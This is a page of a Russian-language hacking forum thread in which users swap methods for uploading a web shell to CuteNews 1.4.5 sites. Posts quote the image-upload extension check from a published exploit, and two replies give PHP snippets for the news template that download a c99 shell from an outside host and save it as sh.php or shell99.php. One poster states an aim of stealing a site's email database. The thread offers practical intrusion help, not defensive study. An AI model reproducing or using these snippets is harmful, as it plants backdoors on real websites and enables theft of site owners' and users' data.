HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу CuteNews 1.4.5 help
   
Ответ
Страница 2 из 3 < 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 12.08.2008, 08:24
AseRTin
Новичок
Регистрация: 27.05.2008
Сообщений: 5
С нами: 9451017

Репутация: 2
По умолчанию
тему АП
Цитата:
Сообщение от baltazar  
с картинками там проблема,вот взял и передал сплоит что на милворме,вот что получилось
Код:
$allowed_extensions = array("gif", "jpg", "png", "bmp", "jpe", "jpeg");

[...]

for ($image_i = 1; $image_i < ($images_number+1); $image_i++) {
     $current_image = 'image_'.$image_i;

     $image = $_FILES[$current_image]['tmp_name'];
     $image_name = $_FILES[$current_image]['name'];
     $image_name = str_replace(" ", "_", $image_name);

     $img_name_arr = explode(".",$image_name);
     $type = end($img_name_arr);


     if($image_name == ""){ $img_result .= "<br><font color=red>$current_image -> No File Specified For Upload!</font>"; }
     elseif( !isset($overwrite) and file_exists($config_path_image_upload."/".$image_name)){ $img_result .= "<br><font color=red>$image_name -> Image already exist!</font>";}
     elseif( !(in_array($type, $allowed_extensions) or in_array(strtolower($type), $allowed_extensions)) ){
               $img_result .= "<br><font color=red>$image_name ->This type of file is not allowed !!!</font>";
     }
     else{  //Image is OK, upload it

хм... спойт как я понимаю этот: http://milw0rm.com/exploits/4779
куда ты там свою переделку запихал???

p.s. в наличии 4 сайта с такойже проблемой.... хочется стянуть базу мыл...
 
Ответить с цитированием

  #12  
Старый 14.08.2008, 20:48
antarius
Новичок
Регистрация: 02.07.2008
Сообщений: 8
С нами: 9398569

Репутация: 1
По умолчанию
да такая же проблема шелл не залит в 1.4.5 думаем как картинками не идёт тупо орткрывается страница шелла и написано изображения хз чё думать подскажите чё)
 
Ответить с цитированием

  #13  
Старый 09.11.2008, 12:31
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
С нами: 9625938

Репутация: 32
По умолчанию
Вобщем допись

PHP код:
HTML;
$data=implode('',file('http://сай_дошела.ru/shell.php')); 
$fp=fopen('./sh.php','wb');
fputs($fp,$data);
fclose($fp); 
Создает в папке news как видите файл sh.php, это и есть ваш шел
Работает 100% проверял на многих...
Удачи.


P.S. Только незабудьте удалить абсолютно все пробелы
Последний раз редактировалось DJ ][akep; 09.11.2008 в 17:24..
 
Ответить с цитированием

  #14  
Старый 13.11.2008, 10:47
NamahS
Новичок
Регистрация: 26.06.2008
Сообщений: 26
С нами: 9408179

Репутация: 1
По умолчанию
Цитата:
Сообщение от DJ ][akep  
P.S. Только незабудьте удалить абсолютно все пробелы
Постить сюда второй разне буду....
Может поможешь?
Как раз проблема с пробелами(((((
https://forum.antichat.ru/showthread...013#post941013
 
Ответить с цитированием

  #15  
Старый 19.08.2009, 13:08
DanST
Новичок
Регистрация: 23.05.2007
Сообщений: 22
С нами: 9983725

Репутация: -8
По умолчанию
Дайте мне сам сплойт =)
 
Ответить с цитированием

  #16  
Старый 19.08.2009, 13:38
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
С нами: 9230381

Репутация: 90
По умолчанию
Цитата:
Сообщение от DanST  
Дайте мне сам сплойт =)
Поиск для кого придуман?
 
Ответить с цитированием

  #17  
Старый 19.08.2009, 14:03
DanST
Новичок
Регистрация: 23.05.2007
Сообщений: 22
С нами: 9983725

Репутация: -8
По умолчанию
хз
а милворм не пашет
 
Ответить с цитированием

  #18  
Старый 19.08.2009, 15:30
korp
Новичок
Регистрация: 26.09.2008
Сообщений: 29
С нами: 9275143

Репутация: 11
По умолчанию
Если ресурс малопосещяем то просто в шаблоны всунь код шела или форму загрузки и с помощью её залей шелл.
 
Ответить с цитированием

  #19  
Старый 20.08.2009, 15:56
SEWERN
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
С нами: 9123693

Репутация: 94
По умолчанию
элементарно залить шелл))) заходиш в редактирование шаблонов , редактируеш шаблон новостей , заменяеш заблон на

HTML;
$file = file_get_contents('http://suchechka.freehostia.com/c99.txt');
$brd = fopen('shell99.php','w+');
$write = fwrite($brd, $file);

ждеш мин 3) и шелл залит в корень cutenews ( /news/shell99.php ) и в корень сайта http://www.xxx.ru/shell99.php
 
Ответить с цитированием

  #20  
Старый 27.08.2009, 11:24
Calypso
Новичок
Регистрация: 27.04.2009
Сообщений: 1
С нами: 8968365

Репутация: 0
По умолчанию
Цитата:
Сообщение от SEWERN  
элементарно залить шелл))) заходиш в редактирование шаблонов , редактируеш шаблон новостей , заменяеш заблон на

HTML;
$file = file_get_contents('http://suchechka.freehostia.com/c99.txt');
$brd = fopen('shell99.php','w+');
$write = fwrite($brd, $file);

ждеш мин 3) и шелл залит в корень cutenews ( /news/shell99.php ) и в корень сайта http://www.xxx.ru/shell99.php
вот что получается Warning: file_get_contents(http://suchechka.freehostia.com/c99.txt) [function.file-get-contents]: failed to open stream: Permission denied in /usr/home/hosting/esport/ogel2008/admin/data/Default.tpl on line 5
 
Ответить с цитированием
Ответ
Страница 2 из 3 < 1 2 3 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
CuteNews ZweR PHP 2 08.02.2008 14:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.